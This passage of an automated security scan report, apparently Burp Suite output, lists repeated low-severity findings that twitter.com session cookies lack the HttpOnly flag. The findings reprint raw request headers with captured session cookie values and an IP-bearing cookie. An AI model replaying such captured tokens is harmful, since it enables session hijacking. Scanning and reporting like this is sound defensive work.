_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Prucenter HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.48. http://twitter.com/PureADK previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/PureADK

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PureADK HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.49. http://twitter.com/ROBERTPLANT previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ROBERTPLANT

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ROBERTPLANT HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.50. http://twitter.com/RealLamarOdom previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/RealLamarOdom

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealLamarOdom HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.51. http://twitter.com/RobertDuffy previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/RobertDuffy

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RobertDuffy HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.52. http://twitter.com/ScampoLiberty previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ScampoLiberty

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ScampoLiberty HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.53. http://twitter.com/Script_Junkie previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Script_Junkie

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Script_Junkie HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.54. http://twitter.com/Sean_P_Doyle previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Sean_P_Doyle

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sean_P_Doyle HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.55. http://twitter.com/Servigistics previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Servigistics

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Servigistics HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.56. http://twitter.com/ShaunieONeal previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/ShaunieONeal

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ShaunieONeal HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.57. http://twitter.com/Simply_b06 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Simply_b06

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Simply_b06 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.58. http://twitter.com/Simply_b06/status/29173383425949696 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Simply_b06/status/29173383425949696

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CjoOcmV0dXJuX3RvIjtodHRwOi8vdHdpdHRlci5jb20vU2ltcGx5X2Iw%250ANi9zdGF0dXMvMjkxNzMzODM0MjU5NDk2OTY6DGNzcmZfaWQiJTVlM2JiNjY4%250ANWU3MmNhZmY3NzhhY2E3ODRiNDgwODdhOg9jcmVhdGVkX2F0bCsIM07wzC0B%250AOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBjNzRhZWQ1NzkxZjJmNjQiCmZsYXNo%250ASUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1%250Ac2VkewA%253D--6d295a54df06def6a97568ac94ecdce0d4dc8a97; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.59. http://twitter.com/Siobhan_Magnus previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Siobhan_Magnus

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Siobhan_Magnus HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.60. http://twitter.com/SlexAxton previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/SlexAxton

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /SlexAxton HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.61. http://twitter.com/StarWrit previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/StarWrit

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /StarWrit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

11.62. http://twitter.com/Support previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Support

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

_twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Support HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

11.63. http://twitter.com/Svantasukhai previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://twitter.com
Path:	/Svantasukhai

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

